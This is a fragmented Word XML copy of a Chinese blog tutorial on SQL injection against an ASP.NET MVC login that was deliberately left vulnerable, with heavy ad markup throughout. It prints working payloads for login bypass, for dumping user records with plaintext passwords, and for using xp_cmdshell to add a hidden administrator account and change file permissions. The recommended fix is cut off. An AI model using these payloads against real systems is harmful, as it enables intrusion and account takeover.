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ED" w:rsidRPr="008554ED" w:rsidRDefault="008554ED" w:rsidP="008554ED">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="7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8554ED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浅谈SQL注入风险——一个Login拿下Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008554ED" w:rsidRPr="008554ED" w:rsidRDefault="008554ED" w:rsidP="008554ED">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="72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8554ED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2015-11-03     </w:t>
      </w:r>
      <w:r w:rsidRPr="008554ED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4" w:history="1">
        <w:r w:rsidRPr="008554ED">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="1F3A87"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>0</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId5" w:anchor="SOHUCS" w:history="1">
        <w:r w:rsidRPr="008554ED">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="1F3A87"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="008554ED">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="1F3A87"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>个</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidRPr="008554ED">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="1F3A87"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>评论</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008554ED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8554ED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    作者：沧海一滴</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008554ED" w:rsidRPr="008554ED" w:rsidRDefault="008554ED" w:rsidP="008554ED">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720"/>
        <w:jc w:val="righ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6" w:history="1">
        <w:r w:rsidRPr="008554ED">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="1F3A87"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>收藏</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008554ED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r w:rsidRPr="008554ED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  </w:t>
      </w:r>
      <w:r w:rsidRPr="008554ED">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7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8"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0">
              <wp:extent cx="133350" cy="133350"/>
              <wp:effectExtent l="19050" t="0" r="0" b="0"/>
              <wp:docPr id="1" name="图片 1" descr="http://statics.2cto.com/images/dl.jp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tatics.2cto.com/images/dl.jp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554ED">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="1F3A87"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>我要投稿</w:t>
        </w:r>
      </w:hyperlink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本文主要就是介绍SQL注入基本手法，危害，以及如何解决。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技术有点渣渣，大牛勿喷。。。。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一、</w:t>
      </w:r>
      <w:r w:rsidRPr="008554ED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8554ED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"http://www.2cto.com/database/" \t "_blank" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008554ED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8554ED">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="008554ED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只创建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了一个Admin表，结构如下：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71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create table Admin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(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Id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primary key identity(1,1) not null,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Username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nvarchar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(50) not null,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Password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nvarchar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(50) not null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go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插入三条测试数据如下：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228975" cy="990600"/>
            <wp:effectExtent l="19050" t="0" r="9525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before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="420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二、Web项目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这里为了演示，所以我只搭建了一个简单的三层结构（ASP.NET MVC作为UI，DAL，BLL）以及模型Model：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24200" cy="7115175"/>
            <wp:effectExtent l="19050" t="0" r="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 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1. Model模型层的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AdminInfo.cs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2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8595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859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/// Admin 模型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编号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Id { get; set; } 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账号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string Username { get; set; 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密码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string Password { get; set; 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 xml:space="preserve">2. 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Web.config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添加连接字符串：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3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638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80"/>
        <w:gridCol w:w="15900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5900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connectionStrings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&lt;add name="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BlogDemo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connectionString="server=.;database=BlogDemo;uid=sa;pwd=LonelyShadow"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providerName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System.Data.SqlClient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"/&gt;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connectionStrings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3. DAL数据层的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DBHelper.cs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辅助类：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4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557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14970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4970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System.Configuration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 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Guying.BlogsDemo.DAL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/// 数据访问辅助类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DBHelper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      ///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BlogDemo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数据库链接字符串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readonly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string CONNECTIONSTRING = ConfigurationManager.ConnectionStrings["BlogDemo"].ConnectionString;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4. DAL数据层的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AdminService.cs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中写了一个登录的Login方法（SQL存在注入）：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5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996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19365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1936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System.Data.SqlClient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Guying.BlogsDemo.DAL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Admin 数据提供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Admin 登录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name="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"&gt;登录目标对象&lt;/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&lt;returns&gt;返回结果对象，null为登录失败&lt;/returns&gt;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Login(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result = null;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string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string.Format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(" select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Id,Username,Password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from Admin where Username='{0}' and Password='{1}' ",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adminInfo.Username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adminInfo.Password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using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SqlConnection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SqlConnection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DBHelper.CONNECTIONSTRING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conn.Open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using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SqlCommand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comm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SqlCommand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using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SqlDataReader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reader =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comm.ExecuteReader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if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reader.Read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result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             Id =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)reader["Id"],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Username = reader["Username"].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ToString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(),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    Password = reader["Password"].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ToString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    };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result;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5. BLL业务逻辑的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AdminManager.cs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6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919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8595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859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Guying.BlogsDemo.DAL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Guying.BlogsDemo.BLL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private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null;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if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(_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==null)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Admin 登录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/// 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name="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"&gt;登录目标对象&lt;/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&lt;returns&gt;返回结果对象，null为登录失败&lt;/returns&gt;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Login(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return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AdminService.Login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 xml:space="preserve">6. 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WebUI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层的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HomeController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7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281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12210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2210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System.Web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System.Web.Mvc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Guying.BlogsDemo.BLL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Guying.BlogsDemo.WebUI.Controllers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HomeController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: Controller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[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HttpGet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ActionResult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Login()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return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View();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[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HttpPost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ActionResult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Login(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_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AdminManager.Login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JsonResult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json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JsonResult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() { Data =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ContentEncoding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Encoding.UTF8 };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return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json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7. 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WebUI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的Views/Home/Login：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8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934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65"/>
        <w:gridCol w:w="8880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874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@model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Guying.BlogsDemo.Model.AdminInfo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@{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ViewBag.Title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"Login";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&lt;link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href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="~/CSS/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home.login.css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rel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stylesheet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&lt;div class="box-max"&gt;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&lt;h2&gt;Login&lt;/h2&gt;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&lt;hr /&gt;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@using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Html.BeginForm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Html.AntiForgeryToken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Html.ValidationSummary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(true)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&lt;table&gt;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th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&gt;账号：&lt;/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th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&lt;td&gt;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Html.EditorFor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(model =&gt;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model.Username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Html.ValidationMessageFor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(model =&gt;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model.Username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&lt;/td&gt;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th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密码：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th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&lt;td&gt;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Html.EditorFor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(model =&gt;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model.Password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@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Html.ValidationMessageFor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(model =&gt;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model.Password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&lt;/td&gt;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 &lt;td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colspan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="2"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align="center"&gt;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&lt;input type="submit"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value="登 录"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&lt;/td&gt;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&lt;/table&gt;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&lt;/div&gt;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8. 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WebUIHome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/Login的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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9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8000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80"/>
        <w:gridCol w:w="17520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7520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*{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transition:all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0.3s;}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body{margin:0px; padding:0px; background-color:#F8F8F8;}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.box-max{ width:500px; margin:100px auto; border:1px solid #CCC; padding:10px; border-radius:10px; background-color:#FFFFFF;}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.box-max table{width:100%;}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.box-max table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{line-height:40px;}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.box-max table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th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{text-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align:right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.box-max table td input{width:100%;}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.box-max table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tr:last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-child input{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width:auto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; padding:5px 10px; background-color:#FFF; border:1px solid black; border-radius:5px;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cursor:pointer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.box-max table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tr:last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-child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input:hover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{background-color:#EFEFEF; text-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decoration:underline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;}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outlineLvl w:val="2"/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9. 运行结果：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8425" cy="5219700"/>
            <wp:effectExtent l="19050" t="0" r="9525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c9ff355f577fa80b&amp;k=ddos%B7%C0%D3%F9&amp;k0=ddos%B7%C0%D3%F9&amp;k1=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k2=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k3=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k4=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k5=ddos%B7%C0%BB%F0%C7%BD&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=1&amp;mcpm=100588&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=ba87f575f35ffc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5" name="图片 5" descr="ddos防御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os防御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2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ddos防御</w:t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c9ff355f577fa80b&amp;k=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k0=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k1=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k2=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k3=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k4=ddos%B7%C0%BB%F0%C7%BD&amp;k5=ddos%B7%C0%D3%F9&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=2&amp;mcpm=116380&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=ba87f575f35ffc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6" name="图片 6" descr="短信验证码接口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短信验证码接口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短信验证码接口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c9ff355f577fa80b&amp;k=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k0=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k1=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k2=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k3=ddos%B7%C0%BB%F0%C7%BD&amp;k4=ddos%B7%C0%D3%F9&amp;k5=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=3&amp;mcpm=105272&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=ba87f575f35ffc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7" name="图片 7" descr="oa办公系统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a办公系统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oa办公系统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cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=1&amp;fv=9&amp;is_app=0&amp;jk=c9ff355f577fa80b&amp;k=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k0=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k1=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k2=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k3=ddos%B7%C0%BB%F0%C7%BD&amp;k4=ddos%B7%C0%D3%F9&amp;k5=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;kdi0=1&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=4&amp;mcpm=9748&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=ba87f575f35ffc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8" name="图片 8" descr="路由器设置密码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路由器设置密码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路由器设置密码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c9ff355f577fa80b&amp;k=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k0=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k1=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k2=ddos%B7%C0%BB%F0%C7%BD&amp;k3=ddos%B7%C0%D3%F9&amp;k4=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k5=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=5&amp;mcpm=87434&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=ba87f575f35ffc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9" name="图片 9" descr="app开发报价单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开发报价单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app开发报价单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spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="420" w:lineRule="atLeast"/>
        <w:ind w:left="720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</w:pPr>
      <w:r w:rsidRPr="008554ED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三、注入1. 废话不多说、直接测试注入。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账号： ' or 1=1 -- ，密码(随意)：  fuck ，结果如下：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8425" cy="5219700"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="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b56b09ed1ae3ce47&amp;k=ddos%B7%C0%D3%F9&amp;k0=ddos%B7%C0%D3%F9&amp;k1=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k2=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k3=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k4=ddos%B7%C0%BB%F0%C7%BD&amp;k5=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=1&amp;mcpm=110369&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=47cee31aed096bb5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11" name="图片 11" descr="ddos防御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dos防御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2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ddos防御</w:t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cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=5&amp;ch=0&amp;di=1&amp;fv=9&amp;is_app=0&amp;jk=b56b09ed1ae3ce47&amp;k=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k0=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k1=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k2=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k3=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k4=ddos%B7%C0%BB%F0%C7%BD&amp;k5=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;kdi0=1&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=2&amp;mcpm=9767&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=47cee31aed096bb5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12" name="图片 12" descr="路由器设置密码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路由器设置密码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路由器设置密码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b56b09ed1ae3ce47&amp;k=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k0=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k1=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k2=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k3=ddos%B7%C0%BB%F0%C7%BD&amp;k4=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k5=ddos%B7%C0%D3%F9&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=3&amp;mcpm=118179&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=47cee31aed096bb5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13" name="图片 13" descr="短信验证码接口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短信验证码接口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短信验证码接口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b56b09ed1ae3ce47&amp;k=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k0=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k1=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k2=ddos%B7%C0%BB%F0%C7%BD&amp;k3=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k4=ddos%B7%C0%D3%F9&amp;k5=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=4&amp;mcpm=63697&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=47cee31aed096bb5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14" name="图片 14" descr="文档管理系统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文档管理系统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文档管理系统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5&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b56b09ed1ae3ce47&amp;k=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k0=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k1=ddos%B7%C0%BB%F0%C7%BD&amp;k2=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k3=ddos%B7%C0%D3%F9&amp;k4=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k5=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=5&amp;mcpm=109571&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=47cee31aed096bb5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15" name="图片 15" descr="oa办公系统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a办公系统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oa办公系统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你还在认为注入只是为了绕过登录进入网站么？那你就错了。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8425" cy="5219700"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="16" name="图片 1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1&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b9682ad1fc41e458&amp;k=ddos%B7%C0%D3%F9&amp;k0=ddos%B7%C0%D3%F9&amp;k1=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k2=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k3=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k4=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k5=ddos%B7%C0%BB%F0%C7%BD&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=1&amp;mcpm=118897&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=58e441fcd12a68b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17" name="图片 17" descr="ddos防御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dos防御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2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ddos防御</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008554ED" w:rsidRPr="008554ED" w:rsidRDefault="008554ED" w:rsidP="008554ED">
      <w:pPr>
        <w:widowControl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1&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b9682ad1fc41e458&amp;k=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k0=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k1=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k2=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k3=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k4=ddos%B7%C0%BB%F0%C7%BD&amp;k5=ddos%B7%C0%D3%F9&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=2&amp;mcpm=137564&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=58e441fcd12a68b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18" name="图片 18" descr="短信验证码接口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短信验证码接口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短信验证码接口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cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=1&amp;ch=0&amp;di=1&amp;fv=9&amp;is_app=0&amp;jk=b9682ad1fc41e458&amp;k=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k0=%C2%B7%D3%C9%C6%F7%C9%E8%D6%C3%C3%DC%C2%EB&amp;k1=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k2=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k3=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k4=ddos%B7%C0%BB%F0%C7%BD&amp;k5=ddos%B7%C0%D3%F9&amp;kdi0=1&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=3&amp;mcpm=9750&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=58e441fcd12a68b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19" name="图片 19" descr="路由器设置密码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路由器设置密码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路由器设置密码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1&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b9682ad1fc41e458&amp;k=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k0=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;k1=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k2=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k3=ddos%B7%C0%BB%F0%C7%BD&amp;k4=ddos%B7%C0%D3%F9&amp;k5=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=4&amp;mcpm=124435&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=58e441fcd12a68b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2667000" cy="1905000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="oa办公系统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a办公系统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oa办公系统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cpro.baidu.com/cpro/ui/uijs.php?adclass=0&amp;app_id=0&amp;c=news&amp;cf=1&amp;ch=0&amp;di=8&amp;fv=9&amp;is_app=0&amp;jk=b9682ad1fc41e458&amp;k=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k0=app%BF%AA%B7%A2%B1%A8%BC%DB%B5%A5&amp;k1=%CE%C4%B5%B5%B9%DC%C0%ED%CF%B5%CD%B3&amp;k2=ddos%B7%C0%BB%F0%C7%BD&amp;k3=ddos%B7%C0%D3%F9&amp;k4=%B6%CC%D0%C5%D1%E9%D6%A4%C2%EB%BD%D3%BF%DA&amp;k5=oa%B0%EC%B9%AB%CF%B5%CD%B3&amp;kdi0=8&amp;kdi1=8&amp;kdi2=8&amp;kdi3=8&amp;kdi4=8&amp;kdi5=8&amp;luki=5&amp;mcpm=103349&amp;n=10&amp;p=baidu&amp;q=77zb_cpr&amp;rb=1&amp;rs=1&amp;seller_id=5&amp;sid=58e441fcd12a68b9&amp;ssp2=1&amp;stid=22&amp;t=tpclicked3_hc&amp;td=&amp;tu=u2597675&amp;u=http%3A%2F%2Fwww%2E2cto%2Ecom%2FArticle%2F201511%2F448553%2Ehtml&amp;urlid=0" \t "_blank" </w:instrText>
      </w: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</w:p>
    <w:p w:rsidR="008554ED" w:rsidRPr="008554ED" w:rsidRDefault="008554ED" w:rsidP="008554ED">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="7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667000" cy="1905000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="图片 21" descr="app开发报价单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pp开发报价单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line="270" w:lineRule="atLeast"/>
        <w:ind w:left="750"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008554ED">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>app开发报价单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008554ED" w:rsidRPr="008554ED" w:rsidRDefault="008554ED" w:rsidP="008554ED">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="7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554ED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竟然返回的是一个包含整个用户信息的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Json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？！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这也是一个程序设计的严重不当！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不知道大家前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阵子还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记得某酒店、某招聘网站，就是因为移动App，被人抓包，截取到了一个request，提交id，则会返回其所有基本信息。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最后导致千万级数据泄露。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也就是类似于下面这样操作：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2. 获取所有用户信息：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这里需要主键字段，我就不注入检测了，假设我们已经测出了主键为ID。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那么我们可以登录这样写(密码随意)：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账号： ' or (1=1 and Id=1) -- ，返回结果： {"Id":1,"Username":"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admin","Password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":"admin1234"} ；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账号： ' or (1=1 and Id=2) -- ，返回结果： {"Id":2,"Username":"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zhangsan","Password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":"666666"} ；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账号： ' or (1=1 and Id=3) -- ，返回结果： {"Id":3,"Username":"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lisi","Password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":"888888"}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如果我们写一个程序，循环发送这个请求，将获得的数据保存，那么你的用户数据裤子是不是也要被脱得干干净净了？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3. 下一步，经典的开启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（看不懂的自行Google）：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账号： ' or 1=1; exec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sp_configure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 ' show advanced options ' ,1; reconfigure; exec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sp_configure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' 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' ,1; reconfigure; --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后面操作的结果就不用看了，也是返回前面登录用户的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Json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，但是已经成功执行后面的代码了。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然后，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已经获取了，你还想干什么不行？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这里我只做一个概念性的测试，演示一下其危害。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根据项目的不同，注入可能还会导致更严重的后果。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当然，你也可以创建文件，添加任务等，例如这样：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添加隐藏账号，并提升管理员组：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账号填写： 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' or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1=1; exec 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 ' echo net user $fuck 123456 /add &gt; D:\a.bat &amp; echo net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localgroup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administrators $fuck /add &gt;&gt; D:\a.bat &amp; echo exit &gt;&gt; D:\a.bat ' --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修改权限/修改所有者：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账号填写： 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' or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1=1; exec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' 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icacls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D:\a.bat / setowner everyone &amp; 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icacls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D:\a.bat / grant everyone:F ' --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执行：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账号填写： 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' or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 1=1; exec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xp_cmdshell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 ' D: &amp; D:\a.bat ' --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结果：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67500" cy="3228975"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="图片 2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好吧，上面DOS你懂得。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 xml:space="preserve">当然，你还可以通过DOS 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xxxxxxxxxxxxxxxxxxxxxxxxxxxxx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。。。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四、如何避免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这个应该很简单吧，其实就是我们日常编码习惯的问题。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登录SQL可以改成通过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SqlParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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传参的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方式，返回结果可以设置返回</w:t>
      </w:r>
      <w:proofErr w:type="spell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bool</w:t>
      </w:r>
      <w:proofErr w:type="spell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来标识成功/失败，修改后的方法如下：平时写代码，多注意下这些问题。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45" w:history="1">
        <w:r w:rsidRPr="008554ED">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="333333"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="19275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600"/>
        <w:gridCol w:w="18675"/>
      </w:tblGrid>
      <w:tr w:rsidR="008554ED" w:rsidRPr="008554ED" w:rsidTr="008554ED">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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8675" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr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 System;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System.Collections.Generic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System.Linq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System.Text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System.Data.SqlClient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using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Guying.BlogsDemo.Model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namespace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Guying.BlogsDemo.DAL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Admin 数据提供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AdminService</w:t>
            </w:r>
